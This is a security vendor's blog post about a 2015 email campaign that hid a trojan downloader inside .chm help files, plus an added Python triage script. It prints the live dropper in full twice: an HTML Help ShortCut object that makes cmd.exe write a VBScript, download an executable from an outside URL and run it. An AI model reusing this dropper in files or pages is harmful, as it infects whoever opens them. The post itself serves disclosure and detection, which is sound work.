MailGuard Editor 03 March 2015 23:43:00 AEDT 3 MIN READ

Zero Day Malware Variant ‘Cryptor’ Embedded In .CHM Documents

Early this morning, MailGuard identified a new malware distribution technique in which trojan downloaders are embedded in .chm (compiled HTML Help) documents. Here is a sample email:

[Image 1: the sample email]

The malicious emails carry a .zip attachment (in this case named Transaction info E579657586.zip) which contains the .chm file.

.chm files are Microsoft Compiled HTML Help files: a container of HTML pages (with their images and scripts) that Windows opens in the HTML Help viewer (hh.exe) and that Microsoft and other vendors ship as application help. The viewer renders those pages with the Internet Explorer engine and exposes the HTML Help ActiveX control to them, so a .chm can do considerably more than display text.

Here is an example of the malicious .chm file opened on a Microsoft Windows system.

[Image 2: the opened .chm file]

Inside the .chm is an HTML page that embeds the HTML Help ActiveX control (hhctrl.ocx, CLSID adb880a6-d8ff-11cf-9377-00aa003b7a11) with its ShortCut command. ShortCut launches the program named in Item1, here cmd.exe, which writes a Visual Basic script (tt.vbs) line by line with echo and then runs it with cscript.exe. No exploit is involved: this is the control's documented ability to start a program. The script downloads the malware:

========================================================================================

<!-- HTML Help ActiveX control (hhctrl.ocx), sized 1x1 so it is not visible -->
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<!-- Item1 is "window,program,arguments": cmd.exe echoes tt.vbs into existence and runs it -->
<PARAM name="Item1" value=",cmd.exe,/c @echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)>tt.vbs&@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://www.igloofire.com/tmp/tv.exe&quot;,false>>tt.vbs&@echo objXMLHTTP.send()>>tt.vbs&@echo If objXMLHTTP.Status=200 Then>>tt.vbs&@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)>>tt.vbs&@echo objADOStream.Open>>tt.vbs&@echo objADOStream.Type=1 >>tt.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>tt.vbs&@echo objADOStream.Position=0 >>tt.vbs&@echo objADOStream.SaveToFile &quot;t.exe&quot;>>tt.vbs&@echo objADOStream.Close>>tt.vbs&@echo Set objADOStream=Nothing>>tt.vbs&@echo End if>>tt.vbs&@echo Set objXMLHTTP=Nothing>>tt.vbs&@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)>>tt.vbs&@echo objShell.Exec(&quot;t.exe&quot;)>>tt.vbs&cscript.exe tt.vbs ,">
<PARAM name="Item2" value="273,1,1">
</OBJECT>

========================================================================================

The Visual Basic script fetches an executable from a remote web server with MSXML2.XMLHTTP, writes the response body to disk as t.exe through an ADODB.Stream and launches it with WScript.Shell. The download location is visible in the Item1 parameter above (http://www.igloofire.com/tmp/tv.exe). The remote executable (tv.exe) is the final payload and has been identified as the Cryptor virus, first flagged by AVG. Note that this is not the same as the Cryptolocker virus, and the effects of Cryptor delivered through scam email and infected websites are not the same.
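To triage a sample like this without executing it, the following is an added Python example (written for this article, not MailGuard code). It takes an HTML page pulled out of the .chm (7-Zip can unpack the ITSS container), finds the hhctrl.ocx ShortCut object, splits the cmd.exe command chain the way cmd does (honouring ^ escapes and double quotes), rebuilds the dropped tt.vbs from the echo redirections and lists the URLs the script contacts. SAMPLE_PAGE is the OBJECT block quoted above wrapped in a minimal page; the function and field names are my own.

```python
"""Triage helper: recover the HTML Help 'ShortCut' dropper from a page extracted from a .chm.

Added example, not MailGuard code. Unpack the .chm first (e.g. `7z x sample.chm`) and feed
each extracted .htm/.html page to analyse_hh_shortcut().
"""
import re
from html.parser import HTMLParser

# CLSID of the HTML Help ActiveX control (hhctrl.ocx) that the sample page instantiates.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
URL_RE = re.compile(r"https?://[^\s\"'<>,]+", re.IGNORECASE)
# "@echo <text> >file" / ">>file": one line of the dropped script per command.
ECHO_REDIRECT = re.compile(r"^@?echo\s+(.*?)\s*(>>?)\s*([^\s>]+)$", re.IGNORECASE | re.DOTALL)


class _HHObjectParser(HTMLParser):
    """Collects <PARAM> name/value pairs of every <OBJECT> whose classid is hhctrl.ocx."""

    def __init__(self):
        super().__init__()
        self.objects = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            # HTMLParser has already decoded &quot; and friends in attribute values.
            self._current = {} if HHCTRL_CLSID in a.get("classid", "").lower() else None
            if self._current is not None:
                self.objects.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current[a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag == "object":
            self._current = None


def split_cmd_chain(cmdline):
    """Split a cmd.exe command line on '&' as cmd does: '^' escapes the next character
    and an '&' inside double quotes is literal, so the echoed VBScript survives intact."""
    parts, buf, quoted, i = [], [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == "^" and not quoted and i + 1 < len(cmdline):
            buf.append(cmdline[i + 1])
            i += 2
            continue
        if ch == '"':
            quoted = not quoted
        if ch == "&" and not quoted:
            parts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
        i += 1
    parts.append("".join(buf).strip())
    return [p for p in parts if p]


def reconstruct_dropped_files(commands):
    """Rebuild files written via 'echo ... >file' / '>>file'; return (files, other commands)."""
    files, launchers = {}, []
    for cmd in commands:
        m = ECHO_REDIRECT.match(cmd)
        if not m:
            launchers.append(cmd)  # e.g. the final "cscript.exe tt.vbs"
            continue
        text, op, name = m.groups()
        if op == ">" or name not in files:  # '>' truncates, '>>' appends
            files[name] = []
        files[name].append(text)
    return {n: "\n".join(lines) for n, lines in files.items()}, launchers


def analyse_hh_shortcut(page):
    """Return one finding per hhctrl ShortCut object found in an HTML page from a .chm."""
    parser = _HHObjectParser()
    parser.feed(page)
    parser.close()
    findings = []
    for obj in parser.objects:
        if obj.get("command", "").lower() != "shortcut":
            continue
        # Item1 is "window,program,arguments"; the window part is usually empty.
        _window, program, args = (obj.get("item1", "").split(",", 2) + ["", ""])[:3]
        program = program.strip()
        m = re.match(r"\s*/[ck]\s+(.*)\Z", args, re.IGNORECASE | re.DOTALL)
        if program.lower() in ("cmd", "cmd.exe") and m:
            commands = split_cmd_chain(m.group(1))
        else:
            commands = [f"{program} {args}".strip()]
        dropped, launchers = reconstruct_dropped_files(commands)
        findings.append({"program": program, "commands": commands, "dropped_files": dropped,
                         "launchers": launchers, "urls": sorted(set(URL_RE.findall(args)))})
    return findings


# The OBJECT block quoted in the article, wrapped in a minimal page (constructed test input).
SAMPLE_PAGE = """<html><body>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",cmd.exe,/c @echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)>tt.vbs&@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://www.igloofire.com/tmp/tv.exe&quot;,false>>tt.vbs&@echo objXMLHTTP.send()>>tt.vbs&@echo If objXMLHTTP.Status=200 Then>>tt.vbs&@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)>>tt.vbs&@echo objADOStream.Open>>tt.vbs&@echo objADOStream.Type=1 >>tt.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>tt.vbs&@echo objADOStream.Position=0 >>tt.vbs&@echo objADOStream.SaveToFile &quot;t.exe&quot;>>tt.vbs&@echo objADOStream.Close>>tt.vbs&@echo Set objADOStream=Nothing>>tt.vbs&@echo End if>>tt.vbs&@echo Set objXMLHTTP=Nothing>>tt.vbs&@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)>>tt.vbs&@echo objShell.Exec(&quot;t.exe&quot;)>>tt.vbs&cscript.exe tt.vbs ,">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
</body></html>"""

if __name__ == "__main__":
    for f in analyse_hh_shortcut(SAMPLE_PAGE):
        print("program :", f["program"])
        print("urls    :", ", ".join(f["urls"]))
        print("launch  :", "; ".join(f["launchers"]))
        for name, body in f["dropped_files"].items():
            print(f"--- dropped {name} ---\n{body}")
```

The reconstructed tt.vbs is what cscript.exe would have run, so the URL, the on-disk name (t.exe) and the WScript.Shell launch are all recovered without ever opening the .chm in hh.exe. Pages that use the hhctrl control legitimately (real help files do) will produce no finding unless they carry a ShortCut command, so the output is worth reviewing by hand rather than treating as a verdict.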

Once installed, Cryptor silently installs further malware and may interfere with system processes, disrupting normal use of the infected PC. It also gives the attacker control of the victim's machine and acts as a gateway for installing new malware.

Cryptor is dangerous because it constantly mutates and updates, stealing data and compromising business security.

MailGuard CEO Craig McDonald stated,

“This is a timely reminder to businesses that user education is important to protect the corporate networks from the effects of installing malware such as Cryptor. Zero day attacks are successful because there is a window of time before desktop AV vendors update software to detect these scams. Unless businesses take on a multi-layered approach to network security, including cloud and endpoint security, they are increasing the risk of becoming a target of cybercrime”.

MailGuard identified the first sample early this morning; at the time it was being detected by only 2 of the top 57 AV vendors on the market. This latest spate of Cryptor, delivered via email and web, is being blocked by MailGuard's cloud filtering services.